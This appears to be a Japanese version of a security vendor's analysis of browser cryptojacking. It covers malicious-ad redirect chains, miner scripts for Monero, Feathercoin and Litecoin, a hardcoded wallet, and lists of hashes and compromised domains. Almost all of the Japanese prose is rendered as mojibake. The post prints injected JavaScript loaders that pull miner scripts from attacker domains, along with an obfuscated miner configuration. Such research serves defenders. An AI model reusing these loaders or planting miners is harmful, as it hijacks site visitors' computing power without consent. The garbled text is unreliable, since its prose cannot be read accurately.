ããæ°ãæã§ããã©ãŠã¶ã§çŽæ¥æå·é貚ããã€ãã³ã°ããããã«èšèšãããJavaScriptãã¡ã€ã«ãçºèŠããŸããã ãµã€ããŒç¯çœªè
ã¯é·ãéãã€ãã³ã°ãç¿åŸããŠããŸããããéåžžã被害è
ã®ãã·ã³ã«ãã«ãŠã§ã¢ãŸãã¯äžèŠãš
æãããã¢ããªã±ãŒã·ã§ã³ïŒ
PUA ïŒãã€ã³ã¹ããŒã«ããŸãã ãã®å ŽåããŠãŒã¶ãŒãç¹å®ã®ãµã€ãã«ã¢ã¯ã»ã¹ãããšããã©ãŠã¶ãŒã§ãã€ãã³ã°ãå®è¡ãããŸãã è匱æ§ãæ¢ããããã³ã³ãã¥ãŒã¿ãŒã«ææãããããå¿
èŠã¯ãããŸãã-JavaScriptãæå¹ã«ãªã£ãŠãããã©ãŠã¶ãŒïŒã»ãšãã©ã®ãã©ãŠã¶ãŒã§ã¯ããã©ã«ãïŒã ãã§ãã
埩ç¿
ESETã®ãã¬ã¡ããªã«ãããšãè
åšã®äŒæãã¯ãã«ã®1ã€ã¯
äžæ£ã§ãã CPU䜿çšçã®é«ãã¿ã¹ã¯ã®ã¿ã€ãã¯ããŠãŒã¶ãŒãšã®å¯Ÿè©±ã®è³ªãäœäžããããããã»ãšãã©ã®åºåãããã¯ãŒã¯ããããã¯ããŸãã ãããã³ã€ã³ã®ãã€ãã³ã°ã«ã¯é«æ§èœã®CPUãå¿
èŠãªããããã©ãŠã¶ã§ã®ãã€ãã³ã°ã®èãæ¹ã¯åžžèã«åããŠããããã«æããããããããŸããã ããããWebãã€ããŒã®äœæè
ã¯ãç¹å¥ãªæ©åšãå¿
èŠãšããªãæå·é貚ãéžæããŸããããã·ã³èªäœã§ã¯ãªãããµã€ãã«ãææãããããšã§ååãªæ°ã®ã³ã³ãã¥ãŒã¿ãŒãæäŸããæ¹ãç°¡åã§ãã
åæ§ã®ãã£ã³ããŒã³ã¯ã©ã®åœã§ãå®æœã§ããŸãããå
·äœçã«ã¯ãã®è
åšã¯ãã·ã¢ããŠã¯ã©ã€ãããã©ã«ãŒã·ã§åºãã£ãŠããŸãïŒäžå³ãåç
§ïŒã ã¿ãŒã²ãã£ã³ã°ã®çç±ã¯ãããããã¹ã¯ãªãããåã蟌ãŸãããµã€ãã®èšèªã®éžæã«ãããŸãã
å³1. ESETãã¬ã¡ããªã«ãããšããŠã§ããã€ããŒãæã掻çºãªåœå³2ã¯ãããããã®ãã¡ã€ã³ã®è©äŸ¡ã瀺ããŠããŸãã
âreasedoper[.]pw
ãããã®ã¹ã¯ãªããã¯ãCisco Umbrella Top 1Mã«é
眮ãããŠããŸãã 2017幎3æãã4æã«ãããŠããã®ã¢ãã¬ã¹ã§ã®DNSæ€çŽ¢ã®å€§å¹
ãªå¢å ã«æ³šç®ããŸãã
reasedoper[.]pw
2017幎6æ28æ¥ã«ã
reasedoper[.]pw
ã¯26300çªç®ã®ã©ã€ã³ã«å°éããŸãããåãæ¥ä»ã®è¡ã
å³2. Reasedoper [ã] Cisco Umbrella Top 1Mã®Pwè©äŸ¡ã äœãã»ã©äººæ°ãââé«ããªããŸããç©èª
ãã©ãŠã¶ã§ã®æå·é貚ãã€ãã³ã°ã®ã¢ã€ãã¢ã¯æ°ãããã®ã§ã¯ãããŸããã 2013幎ãããµãã¥ãŒã»ããå·¥ç§å€§åŠïŒMITïŒã®åŠçãããããã³ã€ã³ãã€ãã³ã°çšã®WebãµãŒãã¹ãæäŸããTidbit瀟ãèšç«ããŸããã ãµã€ã管çè
ã¯ãåºåã衚瀺ãã代ããã«ããµã€ãã«Tidbitã¹ã¯ãªãããè¿œå ããŠãã€ãã³ã°ããããšã§ãéã皌ãããšãã§ããŸãã ããã«ããã¡ãŠã³ããŒã¯åæãªãã§ãŠãŒã¶ãŒã®ã³ã³ãã¥ãŒãã£ã³ã°ãã¯ãŒã䜿çšããããå¬åç¶ãåãåããŸããã ãã®çµæãäž¡åœäºè
ã¯
å奜çãªåæã«éããŸããããTidbitãããžã§ã¯ãã¯åæžãããªããã°ãªããŸããã§ããã
以åã¯ã
bitp[.]it
ãªã©ãä»ã®ããã€ãã®ãµãŒãã¹ããã©ãŠã¶ãŒãã€ãã³ã°ãæäŸããŠããŸããã ãµãŒãã¹ã¯ãæšæºã®CPU / GPUã䜿çšãããããã³ã€ã³ã®ãã€ãã³ã°å¹çãäœãããã«ååšããªããªããŸããã ããšãã°ã
bitp[.]it
ãããžã§ã¯ãã¯2011幎7æã«çµäºããŸããã
åºããã¯ã©ãã§ãã
ãã®ã¿ã€ãã®ã¹ã¯ãªãããé
åžããæ¹æ³ã¯ããããæ£åœã§ãããæãŸãããªããã決å®ããŸãã ãã®å ŽåããŠãŒã¶ãŒã«ã¹ã¯ãªãããå®è¡ããã2ã€ã®æ¹æ³ãèŠã€ããŸãããæªæã®ããåºåãŸãã¯ããŒãã³ãŒããããJavaScriptã³ãŒãã§ãã
å³3.ãã€ãã³ã°ã¹ã¯ãªããã®é
åžã¹ããŒã ãæªæã®ããåºåãã€ãã³ã°ã¹ã¯ãªããã®äž»ãªé
åžæ¹æ³ã¯ãæªæã®ããåºåã«ãããã®ã§ãã ããã¯ãåºåãããã¯ãŒã¯ããã®ãã©ãã£ãã¯ã®è³Œå
¥ãšãéåžžã®åºåã§ã¯ãªãæªæã®ããã¹ã¯ãªããã®æ¡æ£ã«åºã¥ããŠããŸãã ãã®ç¹å®ã®ã±ãŒã¹ã§ã¯ãã¹ã¯ãªããã€ã³ãžã§ã¯ã·ã§ã³ãé©çšããããã
listat[.]biz
ã䟵害ããããã¯ããããŸããã ãããã
listat[.]biz
ãæ£åœãª
蚪åè
ã«ãŠã³ã¿ãŒã§ãã
LiveInternetã«ãŠã³ã¿ãŒ ïŒLiveInternetãµã€ãè©äŸ¡ïŒãã³ããŒããŠããããã«èŠãããããæ¬åœã«çãããã§ãã ããã«ã
lmodr[.]biz
ãå«ãå€ãã®çããããã¡ã€ã³ãåãé»åã¡ãŒã«ã¢ãã¬ã¹ã«ç»é²ãããŸãã
lmodr[.]biz
ããã¯ããã®æªæã®ãããã§ãŒã³ã«ãååšããŸãã
2017幎7æã«ãã€ãã³ã°ã¹ã¯ãªããã®ãã©ãã£ãã¯ãæäŸããäž»èŠãªãµã€ãã次ã®å³ã«ç€ºããŸãã ããã§ã¯ãã¹ããªãŒãã³ã°ãããªãŸãã¯ãã©ãŠã¶ã²ãŒã ã®ãããµã€ããäž»æµã§ããããšã«æ°ä»ããŸããã ãŠãŒã¶ãŒã¯åãããŒãžã«æéãè²»ããåŸåããããããããã¯çã«ããªã£ãŠããŸãã ããã«ããã®ãããªããŒãžã«ã¯é«ãCPU䜿çšçãäºæ³ãããããããã€ãã³ã°ã¹ã¯ãªããããã®è¿œå ã®è² è·ããã¹ã¯ã§ããŸãã ãã®ããã圌ã¯ãªããšãããé·ãåãããšãã§ããããå€ãã®èšç®èœåã䜿çšããŠããŸãã
å³4. ESETãã¬ã¡ããªãŒããŒã¿ã«ãããšããã€ãã³ã°ã¹ã¯ãªãããžã®ãã©ãã£ãã¯ãæäŸãããµã€ããæãæªæã®ããåºåã¢ã¯ãã£ããã£ã§ãã
okino[.]tv
ã§ç¢ºèªãããµã€ãã¯éåžžã«äººæ°ããããŸãã å·çæç¹ã§ã圌ã®Alexaã©ã³ãã³ã°ã¯ãã·ã¢ã§907ããŠã¯ã©ã€ãã§233ã§ããã ãã·ã¢ã§ããã1000ã®Alexaã©ã³ãã³ã°ã«ãããã£ã³ããŒã³ã§äœ¿çšãããä»ã®ãµã€ããé«ãäœçœ®ã«ãããŸããã
å³5. Okino [ã] Tvã®Alexaè©äŸ¡
å³6. wotsite [ã] Netã«ã¢ã¯ã»ã¹ãããšãã®CPU䜿çšçãäžã®å³7ã¯ããªãã€ã¬ã¯ããã§ãŒã³ã®èå³æ·±ãäŸã瀺ããŠããŸãã æåã®3ã€ã®ãªãã€ã¬ã¯ãã¯ãå³8ã9ãããã³10ã«ç€ºãããã«ã次ã®é·ç§»ã«ãã£ãŠæäŸãããã¹ã¯ãªãããå®è£
ããŸã
skyadsvideo1[.]ru
ãªãã€ã¬ã¯ãã§äœ¿çšãããæåã®ãã¡ã€ã³ïŒãã®äŸã§ã¯
skyadsvideo1[.]ru
ïŒã¯åžžã«äžèŽããŸããã
code.moviead55[.]ru
ã芳å¯ã§ããŸããã äž¡æ¹ãšãåãIPã¢ãã¬ã¹-167.114.238.246ãš167.114.249.120ã«å±ããŸãã ãµããã¡ã€ã³
code.skyad[.]video
ãåã2ã€ã®ã¢ãã¬ã¹ã«å±ãã
skyad[.]video
ãã¡ã€ã³ã®Whoisã«ãããšããã¡ã€ã³ã¯SkyAdVideoåºåãããã¯ãŒã¯ã®ææè
ãšã®æ¥ç¶ã瀺ããŠããŸãã
å³7. okino [ã] Tvãããã€ãã³ã°ã¹ã¯ãªãããžã®ãªãã€ã¬ã¯ãã®ãã§ãŒã³ã <!--noindex--> <div id="sky_video"></div> <script type="text/javascript" src="http://skyadsvideo1.ru/code.php?v=e225aa8e9c1a68539730f11001490407"></script> <!--/noindex-->
å³8. Okino [ã] Tvã¹ã¿ãŒãããŒãžããã var script = document.createElement('script'); script.src = '//lmodr[.]biz/mdstat2.php'; script.async = true; document.head.appendChild(script)
å³9. Skyadsvideo1ã®ã¹ã¯ãªãããã[ã] Ru / code.phpïŒé£èªå解é€åŸïŒã var script = document.createElement('script'); script.src = '//listat[.]biz/3.html?group=mdstat2_net&seoref=' + encodeURIComponent(document.referrer) + '&rnd=' + Math.random() + '&HTTP_REFERER=' + encodeURIComponent(document.URL); script.async = true; document.head.appendChild(script);
å³10-lmodr [ã] Biz / mdstat2.phpPassiveTotalãæ€çŽ¢ãããšã
listat[.]biz
ã¯ãã€ãã³ã°ã¹ã¯ãªããã®ã¿ã«ãªãã€ã¬ã¯ãããã6æ1æ¥ãš7æ5æ¥ãé€ããå®éã®WebããŒã¹ã®
anstatalsl[.]biz
ã«ãŠã³ããš
anstatalsl[.]biz
ã«ããŠãŒã¶ãŒããªãã€ã¬ã¯ããããŸããã
lmodr[.]biz
listat[.]biz
ããã³
listat[.]biz
ã¯ããã€ãã³ã°ã¹ã¯ãªããã®å®è£
ã«ã®ã¿äœ¿çšãããããã§ãã
function show_260() { var script = document.createElement('script'); script.src = '//mataharirama[.]xyz/launcher.9.single.js'; script.async = true; document.head.appendChild(script); } show_260();
å³11. listat [ã] Biz / 3.htmlãé©ããããšã«ãæåã®ç§»è¡ã§ãã
moviead55[.]ru
ããã€ããŒãå®è£
ã§ããããšã«æ°ä»ããŸããã ãµã€ãã«çŽæ¥æçš¿ãããZCashæå·é貚ããã€ãã³ã°ã§ããŸãã
ws.zstat[.]net:8889
ããããŒã«ã䜿çšããWebãœã±ãããããã³ã«ãä»ããŠéä¿¡ãè¡ãããŸãã ãã ãã
reasedoper[.]pw
é
眮ãããã¹ã¯ãªãããšã³ãŒãã®é¡äŒŒç¹ã¯èŠã€ãããŸããã§ããã ãããã¯èšªåè
ã®èšç®èœåã®æ©æµãåããããŸããŸãªã°ã«ãŒãã®ããã§ãã
ããŒãã³ãŒãã£ã³ã°ãããJavaScriptGoogleãã£ãã·ã¥ã«ã¯ãå³10ãšã»ãŒåãJavaScriptãã©ã°ã¡ã³ããåã蟌ãŸããçŽ60ã®ãµã€ããèŠã€ãããŸããããããã®ãµã€ãã®éå§ããŒãžã¯ã
script.php
åä¿¡ããã¹ã¯ãªãããå®è£
ããŠããŸãã
<script type="text/javascript"> document.write("<script type=text/javascript src=\""+"/script.php?group=4goodluck_org&r="+encodeURIComponent(document.referrer)+"&p="+encodeURIComponent(document.URL)+"\"><\/script>"); </script>
å³12.éå§ããŒãžãžã®ã¹ã¯ãªããã®åã蟌ã¿ããã®ã¹ã¯ãªããã¯ããã€ãã³ã°JSã¹ã¯ãªãããæ ŒçŽãã
static.reasedoper[.]pw
ãªã©ãããŸããŸãªãã¡ã€ã³ã®URLã«ã¢ã¯ã»ã¹ããŸãã ãããã®ã¹ã¯ãªããã®åæã«ã€ããŠã¯ã次ã®ã»ã¯ã·ã§ã³ã§èª¬æããŸãã åã蟌ã¿ã³ãŒããã©ã°ã¡ã³ããååšãããã¡ã€ã³ã®1ã€ã§ãã
listat[.]org
ã¯ãæªæã®ããåºåã«äœ¿çšããããã1ã€ã®IPã¢ãã¬ã¹ïŒ
listat[.]biz
ïŒãšåãIPã¢ãã¬ã¹ãæã£ãŠããŸãã ãã1ã€ã®é¡äŒŒç¹ã¯ããã®ãã£ã³ããŒã³ã§ã䜿çšãããŠããé¢æ°ã®åå
show_260ã§ãã
é¢ä¿ãããã¡ã€ã³ã®äžå®å
šãªãªã¹ãã¯ãæçš¿ã®æåŸã«èšèŒãããŠããŸãã ãããã®ãµã€ãã¯ã©ããåºãç¥ãããŠããããã«ã¯èŠããŸããã
ãã€ãã³ã°ã¯ã©ã®ããã«è¡ãããŸããïŒ
static.reasedoper[.]pw
ããã³
mataharirama[.]xyz
ããã€ãã®ã¹ã¯ãªããããã¹ããããŠããŸãã ååã«
multiãšããåèªãå«ãã¹ã¯ãªããã¯ãååã«
singleãšããåèªãå«ãŸãã1ã€ã®ã¹ããªãŒã ã䜿çšããã¹ã¯ãªãããšã¯ç°ãªãããã«ãã¹ã¬ããã§ãã ãããã¯ãããŸããŸãªæå·é貚ã®ãã€ãã³ã°ãããªã¬ãŒããã³ã¢JavaScriptãã¡ã€ã«ã§ãã ã¹ã¯ãªããã¯å°ãé£èªåãããŠããŸã-æååãªãã©ã«ã¯16é²ãšã¹ã±ãŒãã·ãŒã±ã³ã¹ïŒã\ x42 \ x43 ...ãïŒã䜿çšããŠèšè¿°ãããŸãã
å³13ã¯ããã®ã¹ã¯ãªããã«ãã
Feathercoin ã
Litecoin ã
Moneroã ãã€ãã³ã°ã§ããããšã瀺ããŠããŸãã ã©ã€ãã³ã€ã³ã¯ããæ¡æãããŠããªãããã§ãã
function(_0xab8e5a, _0x36e7b7, _0x4c105c) { _0x36e7b7[_0x7e60('0x5')] = { 'assets_domain': _0x7e60('0xee'), 'debug': !![], 'feathercoin': { 'pool': _0x7e60('0xef'), 'default_wallet': '6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4' }, 'monero': { 'pool': _0x7e60('0xf0'), 'default_wallet': _0x7e60('0xf1') }, 'litecoin': { 'pool': '', 'default_wallet': '' } }; }
å³13. 3çš®é¡ã®æå·é貚ããã€ãã³ã°ã§ããŸããFeathercoinãšLitecoinã¯ãBitcoinã«è§Šçºãããæå·é貚ã§ãã äž»ãªéãã¯
ããããã
neoscryptãš
scryptãšããä»ã®ããã·ã¥ã¢ã«ãŽãªãºã ã䜿çšããŠããããšã§ãã ç®æšã¯ãåŸæ¥ã®CPUã§ã¯ãªããASICãã€ããŒãªã©ã®ç¹å¥ãªæ©åšã®å¿
èŠæ§ãæžããããšã§ãã ãããã®æœåºã«ã¯ãCPUãã¯ãŒã ãã§ãªããããªãã®ã¡ã¢ãªãªãœãŒã¹ãå¿
èŠã§ãã
ææ°ã®
altcoinæå·é貚ã§ããMoneroã¯ãä»ã®2ã€ãšã¯ç°ãªããŸãã äž»ãªæ©èœã¯ããããã³ã€ã³ãšæ¯èŒããŠãã©ã€ãã·ãŒã匷åãããŠããããšã§ãã ãããã¯ãã§ãŒã³ãäžéæã§ããããããã©ã³ã¶ã¯ã·ã§ã³ã®è¿œè·¡ã¯ããå°é£ã§ãã ç¹ã«ã
ãªã³ã°çœ²åã䜿çšããŠãããã€ãã®ç°ãªãã¢ãã¬ã¹ãªãã·ã§ã³ããéä¿¡è
ã¢ãã¬ã¹ãé ããŸãã ãŸããå®éã®åä¿¡è
ãé ãããã«ã転éããšã«æ°ããå
¬éããŒãçæããŸãã
䜿çšãããæå·å€ããã·ã¥ã¢ã«ãŽãªãºã ã倧éã®ã¡ã¢ãªãå¿
èŠãšããŸãã ãããã£ãŠãéåžžã®ãã·ã³ã§JavaScriptãã€ãã³ã°ã«ãã®ã¿ã€ãã®altcoinã䜿çšããããšã¯çã«ããªã£ãŠããŸãã
ãã€ãã³ã°ã«ã¯é«ãèšç®èœåãå¿
èŠãªã®ã§ãæ»æè
ãéåžžã®JavaScriptã®ä»£ããã«
asm.jsã䜿çšããŠããã·ã¥ã¢ã«ãŽãªãºã ãå®è¡ããããšã決ããã®ã¯é©ãããšã§ã¯ãããŸããã Asm.jsã¯ãCã§ã®ãããã®ã¢ã«ãŽãªãºã ã®éåžžã®å®è¡ããã1.5ã2åé
ããªããŸãããã®ãããªã¹ã¯ãªããã¯3ã€ãããŸã
scrypt.asm.js
ïŒLitecoinïŒãcryptonight.asm.jsïŒMoneroïŒãããã³
neoscrypt.asm.js
ïŒFeathercoinïŒã§ãã
æåŸã«ãFeathercoinãŠã©ã¬ããã¢ãã¬ã¹ã¯ãã¹ãŠã®ã¹ã¯ãªããã§åãã§ãããMoneroã¯ç°ãªãã¢ãã¬ã¹ã䜿çšããŸãã åãã¢ãã¬ã¹ãè€æ°ã®ã¹ã¯ãªããã§èŠã€ãã£ãŠããŸãããããã£ãŠããããã¯ãã¹ãŠåããµã€ããŒã°ã«ãŒãã«å±ããŠãããšèããŠããŸãã Moneroã®å¿åæ§ã«ããããŠã©ã¬ããã«ä¿ç®¡ãããŠããéé¡ã確èªã§ããŸããã§ããã Feathercoinã«é¢ããŠã¯ãã¢ãã¬ã¹ã¯ãããã¯ãŒã¯äžã§èŠããŸããã ããã¯ããããããã€ãã³ã°ããŒã«ã®äœ¿çšã«ãããã®ã§ãã
以åã®Webãã€ããŒãžã®ãªã³ã¯
ãã€ãã³ã°ã¹ã¯ãªããã§ãããŒãã³ãŒãã£ã³ã°ãããFeathercoinãŠã©ã¬ããã¢ãã¬ã¹
6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4
èŠã€ãããŸããã Googleæ€çŽ¢ã§ã¯ããã®ã¢ãã¬ã¹ãæ°å¹Žé䜿çšãããŠããããšã瀺ãããŠããŸãã
2016幎ã®åãã«ããŠãŒã¶ãŒã¯CPU 100ïŒ
ãããŒãããã¹ã¯ãªããã«ã€ããŠã®
æçš¿ã§äžæºãèšããŸããã 説æã«ãããšãããã¯åæãããã®ãšéåžžã«äŒŒãŠãããFeathercoinãŠã©ã¬ããã®ã¢ãã¬ã¹ãäžèŽããŠããŸãã çºèŠæããã€ãã³ã°ã¹ã¯ãªããã¯minecrunch [ã] Co.ã«ãããŸããã ãã¡ã€ã³åã§æ€çŽ¢ãããšãcryptocurrencytalk.comã§ã®
è°è«ã«ã€ãªãããŸããããã§ã¯ãKukuninãŠãŒã¶ãŒããæ§ãããªãµãŒãã¹-MineCrunchãã«ã€ããŠèª¬æããŠããŸãã ããã©ãŒãã³ã¹ã«é¢ããŠãèè
ã¯æ¬¡ã®ããã«äž»åŒµããŠããŸãã
ãCPUã§ã®å€å
žçãªãã€ãã³ã°ã§ã¯åå
¥ãå°ãªãããŸãããã»ãšãã©ã®ãã€ãã£ãã¹ããŒãïŒasm.jsã®ãããïŒã§ïŒCPUãŸãã¯ãã®ãããªãã®ã®ã¿ã䜿çšããŠïŒããã€ãã®æ°ããã¯ãªããã³ã€ã³ã®åæ£ãã€ãã³ã°ïŒæ°çŸããã³æ°åã®ããžã¿ãŒïŒã¯ã»ãšãã©ãããŸããã
[...]
C Scryptãã€ããŒã¯ãæé«ã®ããã©ãŒãã³ã¹ãéæããããã«Emscriptenã䜿çšããŠJavascriptã§ã³ã³ãã€ã«ãããŸããã ããã©ãŒãã³ã¹ã¯ããã€ãã£ãcpuminerã¢ããªã±ãŒã·ã§ã³ã®çŽ1.5åã§ããæåã®æçš¿
ã®ãªã³ã¯ã«ã¯ãäŸãšããŠåãFeathercoinãŠã©ã¬ããã¢ãã¬ã¹ãèšèŒãããŠããŸãã ããã«ãããminer
reasedoper[.]pw
ãš
minecrunch[.]co
éã®ãªã³ã¯ã匷åãã
minecrunch[.]co
MineCrunchã®ç®æšã¯ãåæ£ãã€ãã³ã°ã®ããã®ãªãŒãã³ãœãŒã¹ãµãŒãã¹ãæäŸããããšã§ãããã
reasedoper[.]pw
ã«ãã£ãŠçã¿åºãããåçã¯ãæããã«MineCrunchã®äœè
ïŒãŸãã¯ããŒãã³ãŒãã£ã³ã°ãããã¢ãã¬ã¹ã®ææè
ïŒã®ã¿ã§ãã
ãããã«
ãã€ãã£ãããã°ã©ã ã®ä»£ããã«ã¹ã¯ãªããã䜿çšãããšçç£æ§ãäœäžããŸããããã€ãã³ã°ã¹ã¯ãªããã䜿çšãããµã€ããžã®èšªåè
ã®æ°ã¯ããªãã¬ãŒã¿ãŒã«å©çããããããŸãã Cisco Umbrella Top 1Mã«ãããšã6æã®
reasedoper[.]pw
ã®DNSã«ãã¯ã¢ããã®æ°ã¯
reasedoper[.]pw
ãšåãã§ããã
ãã®ã¢ã¯ãã£ããã£ãåŸæ¥ã®åºåã«ä»£ãããã®ãšèŠãªããŠãããŠãŒã¶ãŒã®åæãªãã«ã¯æãŸãããããŸããã ãã¥ãŒãžã£ãŒãžãŒå·æ¶è²»è
åé¡éšã¯ãåæãåŸãã«ãŠãŒã¶ãŒã®ãã·ã³ã§ãã€ãã³ã°ããããšã¯ãã³ã³ãã¥ãŒã¿ãŒã«ã¢ã¯ã»ã¹ããããšãšåçã§ãããšå€æããŸããã ãããã£ãŠããã®ãããªãµãŒãã¹ã®éçºè
ã¯ããã€ãã³ã°ã®éå§åã«ãŠãŒã¶ãŒã«æ瀺çã«éç¥ããå¿
èŠããããŸããããã¯ãæªæã®ããåºåã«ããé
åžã®å Žåã«ã¯æããã«è¡ãããŸããã§ããã
ãŠãŒã¶ãŒã¯ããã©ãŠã¶ã«ã¢ããªã³ãšããŠã€ã³ã¹ããŒã«ãããåºåãããã«ãŒãŸãã¯ã¹ã¯ãªããã䜿çšããŠããã®ãããªè
åšãã身ãå®ãããšãã§ããŸãã ESET補åã®ãŠãŒã¶ãŒã¯ã
JS / CoinMiner.Aæœåšçã«å®å
šã§ãªãã¢ããªã±ãŒã·ã§ã³ãšããŠèå¥ããããããã®æªæã®ããã¹ã¯ãªããããèªåèªèº«ãä¿è·ããããšãã§ããŸãã
䟵害ã€ã³ãžã±ãŒã¿
URLã¢ãã¬ã¹
SHA-1d5482f2f7bab8a8832f65f6ba5dc2edc5e19687f launcher.5.multi.js
b5d475d9c084d652faabe3888bbda5b673ebe9dd launcher.5.single.js
626646c572211e157dceeb4b918b9f46c3c656f5 launcher.6.single.js
3c70b32180c2e6ae39006eee867135650c98cfa0 launcher.6.multi.js
80c11eb331758a4d6d581ddcb5ebeca9410afe93 launcher.7.multi.js
52317c0abdc69f356dd2865c1fd35923f8beb7d3 launcher.7.single.js
31d40684cd765ef6625fd9a03d2522d84f0ca79b launcher.8.single.js
9bc931ec55d1fed45bec1c571a401f4a201a02cf launcher.8.multi.js
afae4cf246125671b7eae976c7329b4e0729e109 launcher.9.multi.js
3ac2e2d827e39bd802d5e3f7619099696bc38955 launcher.9.single.js
c4c5f13f0250364bd1321d038d56dbf1a97154f8 launcher.10.single.js
29695469e53822602d9b1884c2268a68e80df999 launcher.10.multi.js
b34216ee46ea1355cbc956514012e74ff9712129 launcher.11.multi.js
9394db4ba0ee70673d451547fd4ae40bfea6112d launcher.11.single.js
6f0bf3fa4dea541a7293b89661d539bb602218c6 launcher.12.single.js
3512351bd8903ae82cc1162fed4faaafceba893d launcher.12.multi.js
5adf5146a84699b6aca5e9da52bb629bceaa7726 launcher.13.single.js
8c45141791b94e172fd5ad8eaefebe5ebb8e729c launcher.13.multi.js
519928629becb1f8b18a56609b03d4cea3c52ddd launcher.14.multi.js
c5629530af39c99c25f83baee7db4a24a9d0aa03 launcher.14.single.js
bf3a1151bc4f8188f735583257ecbbd1eaff123f launcher.15.multi.js
6e5d2b1b9f1140079f3b48edec09c8515e77e14d launcher.15.single.js
12b1bfd6b49c02f928f0429f1505d114583c213c monero.worker.js
885f102c9d4dd2e286401756ca265e4aa3f7a664 scrypt.worker.js
çºèŠJS / CoinMinerãæœåšçã«å®å
šã§ãªãã¢ããªã±ãŒã·ã§ã³ããŒãã³ãŒããããåã蟌ã¿å¯èœãã¡ã€ã³
allday[.]in[.]ua
anekbook[.]ru
bike[.]co[.]ua
cg-lab[.]ru
dikobras[.]com
doctrina62[.]ru
ekavuz[.]ru
fenix-45[.]ru
ipnalog[.]ru
jobochakov[.]com
kharkov-arenda[.]com[.]ua
kuzdoska[.]ru
laminirovanievolos[.]ru
marlin-group[.]ru
mat4ast[.]com
megalifez[.]net
mirstihoff[.]ru
munirufa[.]ru
murlyka[.]net[.]ua
newscom[.]ru
obad[.]ru
ogms[.]ru
opinionblog[.]ru
optiplast[.]ru
otdamprimy[.]ru
pcook[.]ru
pogelanie[.]info
posbank[.]ru
programs-tv[.]ru
psinovo[.]ru
scoot-club[.]ru
ska4ka[.]com
stihi[.]by
stihoslov[.]ru
subcar[.]org
sumytex[.]in[.]ua
suntehnic[.]ru
td-klassik[.]ru
trbook[.]com[.]ua
vstupino[.]su
x-sport[.]info